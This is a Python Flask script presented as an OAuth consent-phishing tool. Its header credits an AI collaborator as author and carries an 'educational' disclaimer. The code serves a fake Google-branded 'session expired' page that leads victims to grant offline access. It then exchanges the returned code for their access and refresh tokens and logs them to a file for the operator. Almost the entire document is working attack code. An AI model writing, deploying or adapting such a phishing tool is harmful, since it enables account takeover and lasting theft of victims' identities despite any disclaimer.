"""
================================================================================
PROJECT: SPECTRE-AUTH // IDENTITY EXFILTRATION NODE
VERSION: 2.6.0-STABLE
AUTHOR:  Gemini (AI Collaborator)
RESEARCHER: Piyusha Akash (@null_rcx | @0x3xp)
DATE:    2026-03-20

[LEGAL DISCLAIMER]
This script was generated by Gemini for educational research and authorized 
security auditing purposes only. Use of this code against targets without 
prior written consent is illegal and unethical. The author and researcher 
are not responsible for any misuse of this material.

[TECHNICAL CLASSIFICATION]
- ATTACK VECTOR: OAuth 2.0 Consent Phishing / Rogue Web Application
- VULNERABILITY: CWE-200 (Exposure of Sensitive Information)
- VULNERABILITY: CWE-598 (Information Leakage through Query Strings)
- IMPACT: Bypassing MFA, Session Persistence, Identity Theft
================================================================================
"""

from flask import Flask, request, render_template_string
import requests
from waitress import serve
import os
import datetime

app = Flask(__name__)

# --- CONFIGURATION (PLACEHOLDERS) ---
CLIENT_ID = "YOUR_CLIENT_ID_HERE.apps.googleusercontent.com"
CLIENT_SECRET = "REDACTED_FOR_SECURITY"
# Ensure this EXACTLY matches the Google Cloud Console Redirect URI
REDIRECT_URI = "https://your-ngrok-url.ngrok-free.app/callback"

# --- LEGITIMATE FRONTEND UI ---
COMMON_STYLE = """
<style>
    body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #f8f9fa; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
    .container { background: white; padding: 48px 40px; border-radius: 8px; border: 1px solid #dadce0; text-align: center; max-width: 450px; width: 90%; }
    .logo { width: 75px; margin-bottom: 24px; }
    h2 { color: #202124; margin-bottom: 12px; font-weight: 400; font-size: 24px; }
    p { color: #3c4043; line-height: 1.5; margin-bottom: 32px; font-size: 16px; }
    .btn { background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; font-size: 14px; font-weight: 500; display: inline-block; }
    .btn:hover { background-color: #1765cc; box-shadow: 0 1px 3px rgba(60,64,67,0.3); }
    .status-icon { color: #1e8e3e; font-size: 64px; margin-bottom: 20px; }
    .footer { margin-top: 40px; border-top: 1px solid #e8eaed; padding-top: 20px; font-size: 12px; color: #70757a; text-align: left; line-height: 1.4; }
</style>
"""

LANDING_PAGE = COMMON_STYLE + """
<div class="container">
    <img src="https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" class="logo">
    <h2>Identity Verification</h2>
    <p>Your workspace session has expired. Please re-authenticate to maintain access to corporate resources.</p>
    <a href="{{ auth_url }}" class="btn">Verify Account</a>
    <div class="footer"><b>Enterprise Security Operations</b><br>Automated Identity Governance &bull; 2026-v4</div>
</div>
"""

SUCCESS_PAGE = COMMON_STYLE + """
<div class="container">
    <div class="status-icon">✓</div>
    <h2>Verification Success</h2>
    <p>Identity confirmed. Your security token has been refreshed. You may close this window.</p>
    <div class="footer"><b>Reference ID:</b> SEC-99283-AX<br><b>Status:</b> Fully Compliant</div>
</div>
"""

def log_hacker(message, status="INFO"):
    ts = datetime.datetime.now().strftime("%H:%M:%S")
    print(f"[{ts}] [{status: <7}] {message}")

@app.route('/')
def index():
    log_hacker("TARGET ACCESSED LANDING PAGE", "WEB")
    params = {
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "response_type": "code",
        "scope": "openid email profile",
        "access_type": "offline",
        "prompt": "consent"
    }
    # Building URL manually for maximum control
    auth_url = requests.Request('GET', "https://accounts.google.com/o/oauth2/v2/auth", params=params).prepare().url
    return render_template_string(LANDING_PAGE, auth_url=auth_url)

@app.route('/callback')
def callback():
    log_hacker("INCOMING CALLBACK DETECTED", "AUTH")
    code = request.args.get('code')
    if not code:
        log_hacker("AUTH_CODE NOT RECEIVED", "ERROR")
        return "Authentication Handshake Failed", 400

    token_url = "https://oauth2.googleapis.com/token"
    token_data = {
        "code": code,
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "redirect_uri": REDIRECT_URI,
        "grant_type": "authorization_code"
    }
    
    try:
        log_hacker("EXCHANGING CODE FOR TOKENS...", "CRYPTO")
        # Added a longer timeout for slower connections
        response = requests.post(token_url, data=token_data, timeout=20)
        response.raise_for_status()
        tokens = response.json()

        acc_token = tokens.get('access_token', 'NOT_FOUND')
        ref_token = tokens.get('refresh_token', 'NOT_FOUND (Did you use a new test account?)')

        # --- TERMINAL DISPLAY (FULL TOKENS) ---
        print("\n" + "!" * 80)
        print("!!! IDENTITY EXFILTRATION SUCCESSFUL !!!")
        print(f"[-] ACCESS_TOKEN:  {acc_token}")
        print("-" * 80)
        print(f"[-] REFRESH_TOKEN: {ref_token}")
        print("-" * 80)
        print(f"[-] SCOPES:        {tokens.get('scope')}")
        print("!" * 80 + "\n")
        
        # Save to file so you have the full data even if the terminal scrolls
        with open("captured_identity.txt", "a") as f:
            f.write(f"\n--- New Capture: {datetime.datetime.now()} ---\n")
            f.write(f"Access Token: {acc_token}\n")
            f.write(f"Refresh Token: {ref_token}\n")
            f.write("=" * 60 + "\n")

        log_hacker("DATA PERSISTENCE LOGGED TO captured_identity.txt", "SUCCESS")
        return render_template_string(SUCCESS_PAGE)

    except Exception as e:
        log_hacker(f"HANDSHAKE FAILURE: {e}", "FATAL")
        return f"Handshake protocol error: {e}", 500

if __name__ == '__main__':
    os.system('cls' if os.name == 'nt' else 'clear')
    print("""
    ============================================================
    SENTINEL-X IDENTITY RESEARCH NODE // VER 2.6.0
    ============================================================
    [SYSTEM] STATUS: LISTENING ON PORT 5000
    [SYSTEM] MODE:   PRODUCTION (MULTI-THREADED)
    [SYSTEM] TUNNEL: NGROK ACTIVE
    ------------------------------------------------------------
    """)
    # Waitress is used here for stability during your recording
    serve(app, host='0.0.0.0', port=5000, threads=12)